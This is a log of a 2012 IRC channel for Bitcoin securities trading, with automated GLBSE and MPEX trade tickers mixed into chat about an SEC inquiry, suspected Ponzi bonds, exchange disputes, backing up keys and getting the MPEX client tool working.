[OBSI.HRPT] 9 @ 0.05988 = 0.5389 BTC [+] Sep 25 21:42:23 [GLBSE] [OBSI.HRPT] 9 @ 0.05991 = 0.5392 BTC [+] Sep 25 21:42:24 [GLBSE] [OBSI.HRPT] 9 @ 0.05994 = 0.5395 BTC [+] Sep 25 21:42:25 [GLBSE] [OBSI.HRPT] 6 @ 0.05997 = 0.3598 BTC [+] Sep 25 21:42:26 [GLBSE] [OBSI.HRPT] 1 @ 0.06 BTC [+] Sep 25 21:42:27 [GLBSE] [OBSI.HRPT] 10 @ 0.06 = 0.6 BTC [+] Sep 25 21:42:28 [GLBSE] [OBSI.HRPT] 3 @ 0.06019 = 0.1806 BTC [+] Sep 25 21:42:29 [GLBSE] [OBSI.HRPT] 1 @ 0.06024854 BTC [+] Sep 25 21:42:29 [GLBSE] [OBSI.HRPT] 9 @ 0.06394 = 0.5755 BTC [+] Sep 25 21:42:31 [GLBSE] [OBSI.HRPT] 20 @ 0.06397 = 1.2794 BTC [+] Sep 25 21:42:32 [GLBSE] [OBSI.HRPT] 50 @ 0.06499997 = 3.25 BTC [+] Sep 25 21:42:33 [GLBSE] [OBSI.HRPT] 2 @ 0.06998 = 0.14 BTC [+] Sep 25 21:42:34 [GLBSE] [OBSI.HRPT] 10 @ 0.07 = 0.7 BTC [+] Sep 25 21:42:35 [GLBSE] [OBSI.HRPT] 205 @ 0.07 = 14.35 BTC [+] Sep 25 21:44:05 [MPEX] [S.MPOE] 7802 @ 0.00038919 = 3.0365 BTC [-] Sep 25 21:44:07 [MPEX] [S.MPOE] 58800 @ 0.00038727 = 22.7715 BTC [-] Sep 25 21:44:08 [MPEX] [S.MPOE] 6200 @ 0.00038653 = 2.3965 BTC [-] Sep 25 21:44:09 [MPEX] [S.MPOE] 50524 @ 0.00038633 = 19.5189 BTC [-] Sep 25 21:44:10 [MPEX] [S.MPOE] 35302 @ 0.00038564 = 13.6139 BTC [-] Sep 25 21:44:11 [MPEX] [S.MPOE] 46900 @ 0.00038556 = 18.0828 BTC [-] Sep 25 21:44:12 [MPEX] [S.MPOE] 13472 @ 0.00038467 = 5.1823 BTC [-] Sep 25 21:52:05 yeah Sep 25 21:52:13 so I dunno Sep 25 22:09:13 [GLBSE] [BAKEWELL] 1 @ 0.10500001 BTC [-] Sep 25 22:09:25 [MPEX] [S.MPOE] 29928 @ 0.00038467 = 11.5124 BTC [-] Sep 25 22:09:26 [MPEX] [S.MPOE] 2000 @ 0.00038448 = 0.769 BTC [-] Sep 25 22:09:29 [MPEX] [S.MPOE] 64472 @ 0.00038344 = 24.7211 BTC [-] Sep 25 22:09:30 [MPEX] [S.MPOE] 15054 @ 0.00038325 = 5.7694 BTC [-] Sep 25 22:09:31 [MPEX] [S.MPOE] 59954 @ 0.00037583 = 22.5325 BTC [-] Sep 25 22:09:32 [MPEX] [S.MPOE] 29866 @ 0.000366 = 10.931 BTC [-] Sep 25 22:15:27 [GLBSE] [ZETA-MINING] 5 @ 0.15220001 = 0.761 BTC [+] Sep 25 22:15:29 [GLBSE] [ZETA-MINING] 9 @ 0.1522 = 1.3698 BTC [-] Sep 25 22:15:30 [GLBSE] [ZETA-MINING] 36 @ 0.152 = 5.472 BTC [-] Sep 25 22:19:42 Check #bitcoin-otc for PANIC. Sep 25 22:22:33 whats going on? Sep 25 22:22:54 Diablo-D3: your helping me fix my printer? Sep 25 22:23:00 :D Sep 25 22:23:23 Some talk of SEC and future of GLBSE. FUD or legit? Sep 25 22:23:31 OneMiner old news. Sep 25 22:23:41 fud as far as I can tell Sep 25 22:23:42 i think the SEC glbse is connected to the pirate passthroughs if anything Sep 25 22:23:46 either that, or pirate works for the SEC Sep 25 22:23:54 connection* Sep 25 22:24:05 Just pointing out the talk. Thought you guys may want to give it a listen. Sep 25 22:24:22 I have no position in bitcoin stocks. Sep 25 22:25:05 Diablo-D3 from the pov of the sec, there was this fraudulent offering of a ponzi scheme Sep 25 22:25:17 which happens to have occured on what seems to be... a fraudulent "exchange" for ponzi schemes ? Sep 25 22:25:23 course it's connected. Sep 25 22:26:05 [MPEX] [S.MPOE] 287113 @ 0.00036 = 103.3607 BTC [-] Sep 25 22:26:43 mircea_popescu: the SEC doesnt care about non-currencies Sep 25 22:27:29 well apparently it cares enough to email ppl. Sep 25 22:27:54 like I said, that guy at the SEC has a high chance of being pirate Sep 25 22:28:16 The SEC cares about anything used to defraud people of value. No matter if it's USD, other fiat, gold, pet rocks or Bitcoins. Sep 25 22:28:33 Diablo-D3 mno, its not pirate. Sep 25 22:28:41 How does pirate would get an email account from sec.gov? Sep 25 22:28:46 BTC-Mining so you buying theymos out ? Sep 25 22:28:54 I hearsay that the SEC letter was emailed back to them for confromation. It came back as legit. I cannot confirm this. Sep 25 22:28:56 BTC-Mining: the sec didnt stop maddof Sep 25 22:29:16 I can, OneMiner Sep 25 22:29:21 someone is buying theymos out? did he lower his price? Sep 25 22:29:21 OneMiner it's a fact. also people have called the guy. Sep 25 22:29:24 it was legit. Sep 25 22:29:27 those 0.5 BTC are rediculous Sep 25 22:29:29 Diablo-D3, they did when they realized it was a scam. Sep 25 22:29:35 Eisenhower34 i was being facetious Sep 25 22:29:49 Yes, that's my understanding. I just put it that way because I can't independently confirm it. Sep 25 22:30:03 BTC-Mining: they had several boxes full of maddof's paperwork mailed to them with a "how to bust maddof" guide included in the box Sep 25 22:30:13 they did nothing for almost a decade. Sep 25 22:30:21 Diablo-D3 you take this very tv approach to things Sep 25 22:30:42 mircea_popescu: whatever that is Sep 25 22:31:08 Diablo-D3: shortsighted approach with fast jumping to conclusions Sep 25 22:31:10 something beyond superficial. "they had boxes" you know this ? were you there ? wtf. Sep 25 22:31:12 [MPEX] [S.MPOE] 132613 @ 0.00036 = 47.7407 BTC [-] Sep 25 22:31:14 [MPEX] [S.MPOE] 115000 @ 0.000369 = 42.435 BTC [+] Sep 25 22:31:52 mircea_popescu: the guy who sent them to the SEC (who used to work for maddof) made it known. Sep 25 22:34:04 Diablo-D3 http://www.sec.gov/news/studies/2009/oig-509.pdf Sep 25 22:34:10 that'd be your source, if you're curious Sep 25 22:34:16 there were numerous tip offs etc. Sep 25 22:34:30 oh dont get me wrong, quite a few people tipped them off Sep 25 22:34:43 this guy just made it his life quest to fuck maddof Sep 25 22:44:27 [GLBSE] [OBSI.HRPT] 126 @ 0.06399999 = 8.064 BTC [-] Sep 25 22:44:28 [GLBSE] [OBSI.HRPT] 32 @ 0.064 = 2.048 BTC [+] Sep 25 22:51:17 nefario really does look to be losing the plot Sep 25 22:51:25 https://bitcointalk.org/index.php?topic=76594.msg1218160#msg1218160 Sep 25 22:51:32 what the fuck kind of idiot response is that Sep 25 22:52:46 BTW Diablo-D3 congrats on getting your position back. Sep 25 22:53:50 dub, what's the issue? Sep 25 22:55:30 NO Sep 25 22:56:47 I still don't see the issue. Sep 25 22:57:02 I am not surprised Sep 25 22:57:26 Well the balances aren't gone indeed. Sep 25 22:58:05 [MPEX] [S.MPOE] 28958 @ 0.00037076 = 10.7365 BTC [+] Sep 25 22:58:06 [MPEX] [S.MPOE] 2387 @ 0.00037 = 0.8832 BTC [-] Sep 25 22:58:11 [GLBSE] [OBSI.HRPT] 17 @ 0.0639995 = 1.088 BTC [-] Sep 25 22:58:53 nefario making unilateral and illogical decisions without communication, locking up a bunch of peoples funds because of his beef with goat, generally acting like a petulant child Sep 25 23:00:10 does anyone know whose behind cryptostocks? Sep 25 23:00:22 Well yeah, but what's the problem with the answer he gave? It's unrelated. Sep 25 23:00:48 the unswer is obtuse and unhelpful to a Luke-Jr degree Sep 25 23:01:56 and how many times has he pasted 'You've been given all the details you need to continue operating without GLBSE.' now? Sep 25 23:02:03 [GLBSE] [BMF] 1 @ 0.45999999 BTC [+] Sep 25 23:02:18 he's losing it Sep 25 23:02:39 [GLBSE] [BMF] 3 @ 0.46 = 1.38 BTC [+] Sep 25 23:04:31 I recommend dropping everything and coming back in a year Sep 25 23:04:42 It's too crazy right now Sep 25 23:04:46 [GLBSE] [OBSI.HRPT] 1 @ 0.06399949 BTC [-] Sep 25 23:04:50 The lack of certainty is killing liquidity Sep 25 23:04:56 EskimoBob: what power? Sep 25 23:05:02 Because goat freaking received all the details he needs but keeps complaining. He got kicked for complaining indefinitly about how he didn't want to sell back the fake shares for 0.10 to start with and now keeps complaining how he can't go on without GLBSE but he's received a list of balances. Sep 25 23:05:28 [GLBSE] [OBSI.HRPT] 1 @ 0.03300001 BTC [-] Sep 25 23:05:43 He can make it work outside GLBSE, he just refuses to. Sep 25 23:05:44 well i thibk nefario had to deal with that earlier... Goat is sometimes a huge pain in a butt Sep 25 23:05:55 I don't approve the kicking out actually... Sep 25 23:06:12 [GLBSE] [OBSI.HRPT] 1 @ 0.06399949 BTC [+] Sep 25 23:06:14 But the fact is, goat received the details to go on without GLBSE. Sep 25 23:06:46 The fact is: both of them are somewhat wrong. I wouldn't deal with either personally. Sep 25 23:07:12 Aye Sep 25 23:08:44 Goat is going to pay out TYGRR bonds in rice Sep 25 23:09:27 rice is gonna be expensive Sep 25 23:09:30 he received the details but how is he supposed to pay out dividends for example? or whats the market value for a buyback? Sep 25 23:09:38 with about 3billion ppl eating it Sep 25 23:09:54 they gave him the informations but hes still more than crippled Sep 25 23:10:40 Here's what can be done. Sep 25 23:10:59 He can auction off a number of assets Sep 25 23:11:04 and go by that price Sep 25 23:11:07 then shut it down Sep 25 23:11:14 [GLBSE] [YABMC] 10 @ 0.07 = 0.7 BTC [-] Sep 25 23:11:15 [GLBSE] [YABMC] 2 @ 0.07 = 0.14 BTC [-] Sep 25 23:11:53 Eisenhower: He has to pay manually to each. For those who haven't claimed yet, he has to keep track of the balance owed to them until they claim the shares. Sep 25 23:12:03 atlas: its probably possible, still childish Sep 25 23:12:08 Or better yet, find another exchange and give the shares there Sep 25 23:12:22 lol CryptoStocks Sep 25 23:12:36 what about crypot? Sep 25 23:12:38 scam? Sep 25 23:12:46 It's not firmly established Sep 25 23:12:55 It's risky to do business with new guys Sep 25 23:12:57 who's behind it? Sep 25 23:13:05 I don't know. Sep 25 23:13:28 cryptoxchange afaik Sep 25 23:13:52 Vircurex Sep 25 23:14:05 oh yes Sep 25 23:14:07 vircurex sorry Sep 25 23:14:10 why should those shares be listed anywhere? Sep 25 23:14:12 i have em on skype Sep 25 23:14:27 any exchange listing shares is just an accessory to fraud Sep 25 23:14:29 Bugpower because people want their money back for those shares? Sep 25 23:15:02 trade them in an irc channel Sep 25 23:15:12 lol ^^ Sep 25 23:15:24 so you spam the irc channel every 5 min with your buy / sell order? Sep 25 23:15:29 open outcry makes a comeback in the digital age! Sep 25 23:15:46 and when someone buys / sells someone, you ahve to go to tygrr and tell him the transaction Sep 25 23:18:23 [GLBSE] [GSDPT] 160 @ 0.0033995 = 0.5439 BTC [+] Sep 25 23:19:23 Anyone selling some BIB.BVPS? Sep 25 23:19:41 http://www.youtube.com/watch?feature=player_embedded&v=kWoQWoRjfGs Sep 25 23:20:40 How much are you selling it for? Sep 25 23:21:40 Eh... Sep 25 23:22:02 I should probably go on MPEX, cheaper there Sep 25 23:22:40 Yeah but MPEX, if you lose your key... you lose all account's content Sep 25 23:23:03 usagi: Do you still need loans? Sep 25 23:23:23 I know mircea_popescu enough to know he wouldn't allow people to recover an account with lost key Sep 25 23:24:34 lol I dare to use that name Sep 25 23:24:47 well can I tell you about my new law? Sep 25 23:24:58 :-) Sep 25 23:25:10 no? Sep 25 23:25:25 [GLBSE] [BTCMC] 1 @ 0.40010001 BTC [-] Sep 25 23:25:27 [GLBSE] [BTCMC] 2 @ 0.4001 = 0.8002 BTC [-] Sep 25 23:25:30 Um.... Sep 25 23:25:36 Vampire is always right... that's the law. Sep 25 23:26:02 I know it is safe from lawyers and laws, but is it safe from "usagi's extravagance"? Sep 25 23:26:05 No? I killed all of the vampires? Sep 25 23:26:07 or so I though Sep 25 23:26:15 [GLBSE] [BFLS.RIG] 1 @ 0.7 BTC [-] Sep 25 23:26:25 usagi is vampire and leech the same? Sep 25 23:26:31 I need to recover vampyro.ro somehow. Sep 25 23:26:39 vampyre.ro Sep 25 23:27:37 BTC-Mining yes, don't lose your keys. Sep 25 23:27:47 [GLBSE] [BFLS.RIG] 1 @ 0.6 BTC [-] Sep 25 23:28:05 [MPEX] [F.GIGA.ETF] 655 @ 0.00050724 = 0.3322 BTC [+] Sep 25 23:28:13 That's one reason I don't want to go on MPEX Sep 25 23:28:48 so this 1% ¨bond¨ is just another get rich quick scheme or reliable? Sep 25 23:28:49 what's the big deal ? just keep the keys safe. Sep 25 23:28:50 CAA? Sep 25 23:28:55 you do have btc walletd don;'t you ? Sep 25 23:29:06 The bank does not help you Sep 25 23:29:11 It prints more money Sep 25 23:29:18 but if you lost funds, you wont help me? Sep 25 23:29:22 the banks are helpfull... I disagree. Sep 25 23:29:27 Even with a backup on USB, who's to say my key wouldn't burn along my PC? Sep 25 23:30:03 I'd have to get a USB backup and have it stored somewhere else, like at a relative or a safebox at the bank. Sep 25 23:30:09 [GLBSE] [OBSI.HRPT] 1 @ 0.06399947 BTC [-] Sep 25 23:30:15 BTC-Mining sooo ? Sep 25 23:30:19 usagi, probably you think I am a dick, a respond would be nice ;) Sep 25 23:30:23 I'm lazy Sep 25 23:30:40 Burn on CD, send to relative. If relative is shady, encrypt. Sep 25 23:30:49 [GLBSE] [OBSI.HRPT] 1 @ 0.03425199 BTC [-] Sep 25 23:31:05 I'll probably get around to it and register on MPEX eventually tho. Sep 25 23:31:13 I understood you are going to issue an 1% bond? Sep 25 23:31:27 Also encrypt and upload to some cloud thingy. Sep 25 23:31:33 BTC-Mining wait for the fee to be 100 btcs :D Sep 25 23:31:35 through NYAN Sep 25 23:32:05 Quote: Dear user. Hotwallet will be shut down on January 1st, 2013. Sep 25 23:32:06 ? Sep 25 23:32:08 Why do you charge that much anyway to join? Sep 25 23:32:10 What's the fee right now? Sep 25 23:32:33 20 Sep 25 23:33:07 I'll pay it right away. Sep 25 23:33:30 use my ref. ;> Sep 25 23:33:47 i always thought he already had an acct Sep 25 23:34:35 I looked at hotwallet, but I got no use for that Sep 25 23:34:47 its 27C3CE9A20851312F086268C27AF75321F2489E8 Sep 25 23:34:53 is it insured and how? Sep 25 23:34:55 if you will. Sep 25 23:35:28 just like a deposit Sep 25 23:36:06 so that way the only one I have to trust is you Sep 25 23:37:13 why? impossible Sep 25 23:37:29 I can sell legally weed here so my profit can be 10000% Sep 25 23:37:39 I can compete Sep 25 23:37:54 but wont Sep 25 23:38:47 no I already own a mining comp and a fund (with paladon) on GLBSE and its more than enough for me at the moment Sep 25 23:39:29 but I will keep your idea in mind for future business usagi Sep 25 23:39:53 let me know when every thing is up and running Sep 25 23:40:36 umm humm? Sep 25 23:40:53 new 'exchange' usagi? Sep 25 23:41:01 Its is a good idea when its trustworthy Sep 25 23:41:05 finance pays great. Sep 25 23:41:20 at least in NYC Sep 25 23:41:54 vampireb: sorta depends actually Sep 25 23:41:55 finance pays great everywhere Sep 25 23:41:57 [GLBSE] [NYAN] 1 @ 0.799 BTC [-] Sep 25 23:42:05 provided you don't suck and you insult people a lot. Sep 25 23:42:12 http://imgur.com/EUNJ5 Sep 25 23:42:15 WTF Sep 25 23:42:23 entry-level analysts don't get all that much money, especially for how much time they spend on it Sep 25 23:42:26 copumpkin: I work in a finance related field... Well not a bank Sep 25 23:42:32 it's sort of a hazing thing Sep 25 23:42:43 Ok, so how do I proceed to get registered on MPEX? I start by sending you my public certificate by email I think? Sep 25 23:42:52 analysyts are slave labor Sep 25 23:43:04 they dont get paid well at all Sep 25 23:43:06 You already have my certificate tho from our contract I believe. Sep 25 23:43:11 vampireb: there you go :) Sep 25 23:43:24 investment banking generally don't pay that much until you get past the first few years Sep 25 23:43:27 then it gets really nice Sep 25 23:43:36 if you work for a hedge fund or something you start out pretty high Sep 25 23:43:37 if you survive Sep 25 23:43:41 BTC-Mining yea, you email your public pgp key Sep 25 23:43:51 http://polimedia.us/bitcoin/faq.html#3 Sep 25 23:45:19 [GLBSE] [BTC-BOND] 1 @ 0.00979999 BTC [+] Sep 25 23:45:21 Could anyone help me "translating" Obsis last statement here regarding his OBSI.HRPT Sep 25 23:45:26 "Due to the very recent developments, it is in the best interest of bondholders for OBSI.HRPT to begin to repurchase these bonds on the market. The next two daily coupons will be paid at 0.2% of IPO price. After that the Estimated Minimum Daily Payout will be the amount of the coupon until the market recovers." Sep 25 23:45:44 whcih recent developments? the tygrr kick out or what? Sep 25 23:46:02 Eisenhower34 prolly just the price drop Sep 25 23:46:43 why did it drop annyway? Sep 25 23:46:51 did someone sell a huge amout? Sep 25 23:47:19 well there's those who believe it to be a ponzi Sep 25 23:47:21 and why is it in our best interest to rebuy them? Sep 25 23:47:29 cause you get money i guess Sep 25 23:47:47 when i buy shares i have to spend money, and dont get it Sep 25 23:47:58 or do i understand somethign wrong? Sep 25 23:48:12 issuer is rebuying Sep 25 23:48:17 spends money, gets shares back. Sep 25 23:48:42 ahh Sep 25 23:49:02 [GLBSE] [ASICMINER] 1 @ 0.1195 BTC [+] Sep 25 23:49:49 and what does his funny "After that the Estimated Minimum Daily Payout will be the amount of the coupon until the market recovers. " means? Sep 25 23:50:19 no clue there. Sep 25 23:51:36 [GLBSE] [FUTUREFUND] 1 @ 0.00012499 BTC [+] Sep 25 23:51:38 [GLBSE] [FUTUREFUND] 1 @ 0.000125 BTC [+] Sep 25 23:52:01 ahh, ok. You have to admit that this isnt at all what he actually said Sep 25 23:52:07 lol i love the new episode of warehouse 13 Sep 25 23:53:01 vampireb: so what financey field are you in? Sep 25 23:53:02 hm still strange Sep 25 23:53:19 why is he lowering payout? he already got the ipo price... Sep 25 23:54:05 [MPEX] [F.GIGA.ETF] 3300 @ 0.00050725 = 1.6739 BTC [+] Sep 25 23:54:07 copumpkin: um.... service provider? :-) Sep 25 23:54:24 vampireb: omg you service people? Sep 25 23:54:49 yea, daily :-) Sep 25 23:54:50 is that what he told you btw, or do you actually know what hes doing with the money? Sep 25 23:55:05 vampireb: omg sounds like fun Sep 25 23:55:08 vampireb: can I get serviced? Sep 25 23:55:20 copumpkin: i think i have mentioned what I do IRL, but want to keep it private for obvious reasons Sep 25 23:55:24 vampireb: boo Sep 25 23:55:30 vampireb: you're best friends with mircea_popescu, right? Sep 25 23:55:37 no... Sep 25 23:55:45 Mircea is in Romania Sep 25 23:55:54 vampireb: your host says you are too! Sep 25 23:55:55 so you would say its save to put some BTC there? Sep 25 23:56:02 surely nobody ever connects from a country other than where they're from Sep 25 23:56:06 [MPEX] [O.BTCUSD.C120T] 16 @ 0.05152157 = 0.8243 BTC [-] Sep 25 23:56:07 [MPEX] [O.BTCUSD.C120T] 984 @ 0.03752662 = 36.9262 BTC [-] Sep 25 23:56:19 ahhh good catch.. My birthtown isnt that far from there Sep 25 23:56:35 only have right now perhaps 40 btc sutting around Sep 25 23:57:20 Romania / Moldavia is almost the same thing.... Sep 25 23:57:29 o you're over teh prut ? Sep 25 23:57:51 there is no ASIC miner comp yet Sep 25 23:58:15 ASICs will be released not sooner than end 2012 Sep 25 23:58:40 I ordered lots of ASICs by BFL, btcfpga and Avalon so Sep 25 23:58:58 promise smomise Sep 25 23:59:05 thanks Sep 25 23:59:22 not for my own wallet though Sep 25 23:59:35 dont know, I took the risk Sep 26 00:00:00 You can only get along with mining if you take risk Sep 26 00:00:06 so I did Sep 26 00:01:10 ASICMINER by friedcat also (looks like) a scam Sep 26 00:01:25 but I already had my say on that Sep 26 00:02:05 so I dont have ASICMINER Sep 26 00:02:52 You have not yet rated user Smickles Sep 26 00:03:28 ;;rated smickles Sep 26 00:03:29 You have not yet rated user smickles Sep 26 00:03:31 hm Sep 26 00:03:41 ;;rated smickles Sep 26 00:03:41 You rated user smickles on Sat Aug 25 08:39:34 2012, giving him a rating of 4, and supplied these additional notes: He's been running MPOE.ETF and releasing THE monthly reports, a model for all Bitcoin financial reporting. Also handled k's of BTC as broker for various clients.. Sep 26 00:03:42 ;;rate smickles 1 sold me a share. Sep 26 00:03:43 Rating entry successful. Your rating of 1 for user smickles has been recorded. Sep 26 00:03:45 ;> Sep 26 00:03:48 oh no. Sep 26 00:03:51 ;;rate smickles 1 sold me THE share. Sep 26 00:03:53 Rating entry successful. Your rating for user smickles has changed from 1 to 1. Sep 26 00:03:57 lol Sep 26 00:04:01 your sense of THE humour Sep 26 00:04:12 ;> Sep 26 00:04:47 the dog ? Sep 26 00:04:56 hello? yes, this is dog Sep 26 00:05:05 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.03349738 = 33.4974 BTC [-] Sep 26 00:05:13 ahahah Sep 26 00:05:16 owned Sep 26 00:05:30 whoops Sep 26 00:05:35 ^_^ Sep 26 00:05:46 owned Sep 26 00:05:54 want some bone marrow ? Sep 26 00:06:03 dog want bone! Sep 26 00:06:57 whoof whoof Sep 26 00:07:12 .tr woof woof Sep 26 00:07:13 mircea_popescu: "woof woof" (en to en, translate.google.com) Sep 26 00:07:23 .echo who's the dog in this relationship Sep 26 00:10:28 cute :) Sep 26 00:11:05 [GLBSE] [NASTY] 1 @ 0.40000001 BTC [-] Sep 26 00:11:07 [GLBSE] [NASTY] 1 @ 0.4 BTC [-] Sep 26 00:11:08 [GLBSE] [NASTY] 1 @ 0.3802 BTC [-] Sep 26 00:11:09 [GLBSE] [NASTY] 3 @ 0.38 = 1.14 BTC [-] Sep 26 00:11:14 [GLBSE] [MOORE] 1 @ 0.42 BTC [-] Sep 26 00:11:49 [GLBSE] [CPA] 65 @ 0.03 = 1.95 BTC [-] Sep 26 00:11:51 [GLBSE] [CPA] 2 @ 0.02502 = 0.05 BTC [-] Sep 26 00:11:52 [GLBSE] [CPA] 10 @ 0.025 = 0.25 BTC [-] Sep 26 00:11:53 [GLBSE] [CPA] 3 @ 0.02102 = 0.0631 BTC [-] Sep 26 00:11:55 [GLBSE] [CPA] 15 @ 0.021 = 0.315 BTC [-] Sep 26 00:11:56 [GLBSE] [CPA] 4 @ 0.02002 = 0.0801 BTC [-] Sep 26 00:11:57 [GLBSE] [CPA] 13 @ 0.02 = 0.26 BTC [-] Sep 26 00:12:07 Anyone knows how to install the MPEx tool on window (the one from aegis) Sep 26 00:12:07 [GLBSE] [007] 1 @ 0.11394999 BTC [+] Sep 26 00:12:08 [GLBSE] [007] 3 @ 0.11395 = 0.3419 BTC [+] Sep 26 00:12:09 [GLBSE] [007] 7 @ 0.114 = 0.798 BTC [+] Sep 26 00:12:11 [GLBSE] [COGNITIVE] 1 @ 0.5 BTC [-] Sep 26 00:12:12 [GLBSE] [COGNITIVE] 4 @ 0.45344001 = 1.8138 BTC [-] Sep 26 00:12:13 [GLBSE] [COGNITIVE] 1 @ 0.45344 BTC [-] Sep 26 00:12:15 [GLBSE] [COGNITIVE] 1 @ 0.4502 BTC [-] Sep 26 00:12:16 [GLBSE] [COGNITIVE] 5 @ 0.45 = 2.25 BTC [-] Sep 26 00:12:43 mpex.exe just open for a fraction of a seconds and close, no idea what's the problem. Sep 26 00:13:08 BTC-Mining you got python ? Sep 26 00:13:19 in any event : open a cmd.exe run it from there Sep 26 00:13:25 you get the error message this way Sep 26 00:14:29 [GLBSE] [007] 17 @ 0.115 = 1.955 BTC [+] Sep 26 00:15:35 [GLBSE] [BFLS] 1 @ 0.6 BTC [-] Sep 26 00:16:02 name 'exit' not defined Sep 26 00:16:10 hm Sep 26 00:16:14 how dod I computer Sep 26 00:16:48 µopen the Terminal.app, do you have Terminal.app??? Sep 26 00:16:57 [GLBSE] [FUTUREFUND] 1 @ 0.000125 BTC [+] Sep 26 00:17:02 it is req Sep 26 00:17:15 [GLBSE] [BLUECHIP] 5 @ 0.1 = 0.5 BTC [+] Sep 26 00:17:28 BTC-Mining sadly i have no ideea Sep 26 00:17:46 i know deadterra has been running Azelphur's code on windows but he installed python Sep 26 00:17:51 Bugpowder, I'm not on a mac Sep 26 00:18:34 I just do it commando style Sep 26 00:18:52 don't be messing with my exchange naked you hear ? Sep 26 00:19:02 ehrm... command line Sep 26 00:19:19 say... since we are on the topic, can I daisy chain commands somehow? Sep 26 00:19:25 or is it one message, one command Sep 26 00:19:34 the later Sep 26 00:19:42 cause it is a pain in the ass to place 10 buy orders Sep 26 00:19:57 well ideally you'd write your own scripts Sep 26 00:20:02 [GLBSE] [BDK.BND] 9 @ 0.081 = 0.729 BTC [-] Sep 26 00:20:03 [GLBSE] [BDK.BND] 100 @ 0.08 = 8 BTC [-] Sep 26 00:20:04 Sep 26 00:20:05 fine Sep 26 00:20:12 I will do this in matlab Sep 26 00:20:24 do it in cobol D: Sep 26 00:20:29 it is the only scripting language i know Sep 26 00:20:39 i guess I should learn python Sep 26 00:20:42 or perl Sep 26 00:21:15 shell script might work? Sep 26 00:21:20 basically, you could daisychain with an awk i imagine Sep 26 00:22:43 [GLBSE] [MPOE.ETF] 1 @ 0.30000001 BTC [-] Sep 26 00:22:44 [GLBSE] [MPOE.ETF] 3 @ 0.3 = 0.9 BTC [-] Sep 26 00:23:33 [GLBSE] [IBB] 1 @ 0.20000001 BTC [-] Sep 26 00:23:35 [GLBSE] [IBB] 3 @ 0.2 = 0.6 BTC [-] Sep 26 00:23:42 Ok, got it working, says couldn't decode reply from MPEx. But since MPEx doesn't have my key... seems totally normal =P Sep 26 00:23:52 :p Sep 26 00:24:19 Welcome to the club! Sep 26 00:24:27 it only took me 8 hours to figure out how to use it Sep 26 00:24:29 but Sep 26 00:24:30 I'll come and ruin you using options mircea Sep 26 00:24:35 that was my fault Sep 26 00:24:49 stupid double click on a subkey that fucked everything up Sep 26 00:25:08 BTC-Mining: come buy my S.MPOE Sep 26 00:25:20 highly undervalued right now Sep 26 00:25:33 [GLBSE] [IBB] 2 @ 0.02 = 0.04 BTC [-] Sep 26 00:26:05 BTC-Mining join the club lol. Sep 26 00:26:09 arf, wait, I forgot to include a referal key in that email Sep 26 00:26:16 [GLBSE] [FDBF] 1 @ 0.149253 BTC [-] Sep 26 00:26:59 [GLBSE] [OBSI.HRPT] 20 @ 0.06353476 = 1.2707 BTC [+] Sep 26 00:27:00 [GLBSE] [OBSI.HRPT] 1 @ 0.06353477 BTC [+] Sep 26 00:27:02 [GLBSE] [OBSI.HRPT] 20 @ 0.06353482 = 1.2707 BTC [+] Sep 26 00:27:03 [GLBSE] [OBSI.HRPT] 1 @ 0.06353483 BTC [+] Sep 26 00:27:04 [GLBSE] [OBSI.HRPT] 92 @ 0.06399949 = 5.888 BTC [+] Sep 26 00:27:04 [GLBSE] [OBSI.HRPT] 22 @ 0.0639995 = 1.408 BTC [+] Sep 26 00:27:06 [GLBSE] [OBSI.HRPT] 44 @ 0.06399999 = 2.816 BTC [+] Sep 26 00:27:08 fuck man Sep 26 00:27:16 I should be daytrading this obsi shit Sep 26 00:27:19 hawt ponzi Sep 26 00:27:39 I sold out at.08-.092 Sep 26 00:27:47 [GLBSE] [OBSI.HRPT] 12 @ 0.06399999 = 0.768 BTC [+] Sep 26 00:27:48 [GLBSE] [OBSI.HRPT] 8 @ 0.064 = 0.512 BTC [+] Sep 26 00:27:49 it went to .03 Sep 26 00:27:50 [GLBSE] [OBSI.HRPT] 50 @ 0.065 = 3.25 BTC [+] Sep 26 00:27:53 i know Sep 26 00:27:59 is this Obsi buying shit back? Sep 26 00:28:11 I figured he was going to buy it back Sep 26 00:28:12 ok, sent you my certificate + a referal key mircea Sep 26 00:28:25 [GLBSE] [OBSI.HRPT] 40 @ 0.065 = 2.6 BTC [+] Sep 26 00:28:26 but then.... nothing Sep 26 00:28:33 just a downward spiral to oblivion Sep 26 00:29:02 aka 'get out of their positions' Sep 26 00:29:24 Bugpowder likely yes. Sep 26 00:29:29 and you know this how? Sep 26 00:29:36 i don't know it Sep 26 00:29:38 usually one person sells Sep 26 00:29:43 and the other person buys Sep 26 00:29:48 he just announced he is and well.. who else would buy it ? Sep 26 00:29:48 I started it dude Sep 26 00:30:00 how much did you sell Sep 26 00:30:13 I started it Sep 26 00:30:16 [MPEX] [F.GIGA.ETF] 1745 @ 0.00050724 = 0.8851 BTC [-] Sep 26 00:32:21 Good for him Sep 26 00:32:32 I sold 1,000 between .08 and .09 Sep 26 00:32:41 Felt stupid Sep 26 00:32:46 A fund? They should try BTC-BOND Sep 26 00:32:50 6% loss Sep 26 00:32:51 https://bitcointalk.org/index.php?topic=112443.msg1220234#msg1220234 this is kinda funny Sep 26 00:32:58 and yes, Bugpowder wouldn't lend them to me ;/ Sep 26 00:32:58 again Sep 26 00:33:06 I sobered up Sep 26 00:33:16 and realized how fucking stupid that would be Sep 26 00:33:35 risk free 1% /wk for you Sep 26 00:33:42 well if you meant to be long it wouldn't have been Sep 26 00:33:42 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 26 00:33:43 depends Sep 26 00:34:02 OBSI.HRPT [1@0.1BTC] paid: 0.068645 BTC. Last price: 0.065 BTC. Capital gain: -0.035 BTC. Total: 0.033645 BTC. (33.6%) Sep 26 00:34:49 I ment to be long just long enough for Obsi to buy back my shares Sep 26 00:35:05 ya. different strategy Sep 26 00:35:08 but the situation looked like it was going to deteriorate further Sep 26 00:35:15 but who the fuck knows Sep 26 00:35:22 F.GIGA was supposed to be toast too Sep 26 00:35:31 now its back Sep 26 00:36:09 Shifting sands Sep 26 00:37:02 [GLBSE] [OBSI.HRPT] 30 @ 0.065 = 1.95 BTC [+] Sep 26 00:37:15 I have a new rule, only daytrade shit that isn't a ponzi scheme Sep 26 00:37:21 Bugpowder i think someone;s decided to arbitrage glbse risk by moving over Sep 26 00:37:47 yes, I wonder if they are fully informed about upgrade risk. Sep 26 00:37:57 though Sep 26 00:38:03 who knows??? Sep 26 00:38:22 [GLBSE] [OBSI.HRPT] 11 @ 0.065 = 